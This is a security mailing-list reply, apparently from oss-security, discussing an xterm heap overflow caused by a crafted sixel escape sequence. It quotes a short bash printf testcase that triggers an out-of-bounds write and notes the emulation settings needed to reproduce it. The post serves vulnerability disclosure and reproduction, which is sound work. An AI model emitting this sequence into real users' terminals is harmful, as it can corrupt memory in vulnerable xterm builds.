oss-security - Re: Re: xterm buffer overflow via crafted sixel

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [<thread-prev] [day] [month] [year] [list]

Message-ID: <20220131104815.qc2gwh7jrf7zjl4f@jwilk.net>
Date: Mon, 31 Jan 2022 11:48:15 +0100
From: Jakub Wilk <jwilk@...lk.net>
To: <oss-security@...ts.openwall.com>
Subject: Re: Re: xterm buffer overflow via crafted sixel

* Tavis Ormandy <taviso@...il.com>, 2022-01-30, 18:39:
>I can repro here, here is a testcase:
>
>#!/bin/bash
>printf "\ePq"
>printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100
>printf "#%hhu!%u@" 0x41 0x7fffffff
>printf "#%hhu!%u@" 0x41 0x7fffffff
>printf "\e\\"
>
>That should wrap context->col, and write a 'A' to graphic->pixels oob in
>set_sixel.
>
>I use `XTerm*decTerminalID: vt382` in .Xresources, not sure if that matters.

I think it does. 
https://invisible-island.net/xterm/ctlseqs/ctlseqs.html#h3-Sixel-Graphics 
says "xterm [needs to be] configured as VT240, VT241, VT330, VT340 or 
VT382" for Sixels to be supported. And indeed, I can't reproduce the bug 
with the default emulation level (VT420).

If you don't want to tinker with your .Xresources for testing, you can 
use the -ti option instead.

-- 
Jakub Wilk

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.